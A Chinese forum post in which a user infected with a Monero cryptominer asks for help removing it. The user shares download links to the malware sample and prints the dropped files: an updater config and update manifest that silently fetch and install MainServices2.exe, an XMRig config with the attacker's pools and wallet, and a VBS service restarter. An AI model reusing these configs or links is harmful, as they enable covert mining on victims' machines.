本帖最后由 落尘之木 于 2018-1-3 10:02 编辑
源于下载一个软件安装包运行,看情势不妙赶紧关掉,然后莫名奇妙的中病毒了,还弹广告,屏幕都变黄色了,从任务管理器找到了一个挖矿脚本,我的电脑已经删除了,不知道有没有后遗症。病毒创建了一个任务,不知道怎么移除,哪位大神分析下在哪里?
这货还有正规的数字签名
这是病毒样本的原文件
直链:https://attachments-cdn.shimo.im ... 9/MainServices2.zip
网盘链接:https://pan.baidu.com/s/1bpHbyMj 密码:18sm
运行后释放挖矿脚本到C:\Program Files\System Native\Main Services,有5个文件
updater.ini
updater.exe
service_box.exe
config.json
check_service.vbs
updater.ini内容:
- [General]
- AppDir=C:\Program Files\System Native\Main Services\
- ID={CE766360-28C8-4FCF-A5EE-F716A678A26E}
- ApplicationName=Main Services
- CompanyName=System Native
- ApplicationVersion=1.1.14
- DefaultCommandLine=/silentall
- CheckFrequency=1
- DownloadsFolder=C:\ProgramData\System Native\Main Services\updates\
- Flags=NoDisableAutoCheck|PerMachine|NoUpdaterInstallGUI
- SupportServiceName=updater
- URL=http://www.temp.uno/ms.txt
复制代码 顺着URL下载的ms.txt内容,里面是病毒文件下载- ;aiu;
- [Update #5]
- NoGUICommandLineSwitch = /quiet PID=0 SUBID=0
- Name = Main Services
- ProductVersion = 1.1.14.0
- URL = https://1406588359.rsc.cdn77.org/files/MainServices2.exe
- Size = 3107168
- MD5 = 0759d7d716397ea852b7726150432b95
- ServerFileName = MainServices2.exe
- Flags = Critical|SilentInstall|Advertises
- RegistryKey = HKUD\Software\System Native\Main Services\Version
- Version = 1.1.14.0
复制代码
config.json内容:
- {
- "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
- "av": 0, // algorithm variation, 0 auto select
- "background": true, // true to run the miner in the background
- "colors": true, // false to disable colored output
- "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
- "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
- "donate-level": 0, // donate level, mininum 1%
- "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
- "max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
- "print-time": 60, // print hashrate report every N seconds
- "retries": 1, // number of times to retry before switch to backup server
- "retry-pause": 5, // time to pause between retries
- "safe": false, // true to safe adjust threads and av settings for current CPU
- "threads": null, // number of miner threads
- "pools": [
- {
- "url": "xmr1.temp.uno:3334",
- "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
- "pass": "x",
- "keepalive": true,
- "nicehash": true
- },
- {
- "url": "xmr2.temp.uno:3334",
- "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
- "pass": "x",
- "keepalive": true,
- "nicehash": true
- },
- {
- "url": "xmr3.temp.uno:3334",
- "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
- "pass": "x",
- "keepalive": true,
- "nicehash": true
- },
- {
- "url": "xmr4.temp.uno:3334",
- "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
- "pass": "x",
- "keepalive": true,
- "nicehash": true
- },
- {
- "url": "xmr.temp.uno:3334",
- "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
- "pass": "x",
- "keepalive": true,
- "nicehash": true
- }
- ],
- "api": {
- "port": 8117, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
- "access-token": null, // access token for API
- "worker-id": null // custom worker-id for API
- }
- }
复制代码 check_service.vbs内容
- Set ServiceSet = GetObject("winmgmts:").ExecQuery("select * from Win32_Service where Name='service_box.exe'")
- for each Service in ServiceSet
- RetVal = Service.StartService()
- next
复制代码
|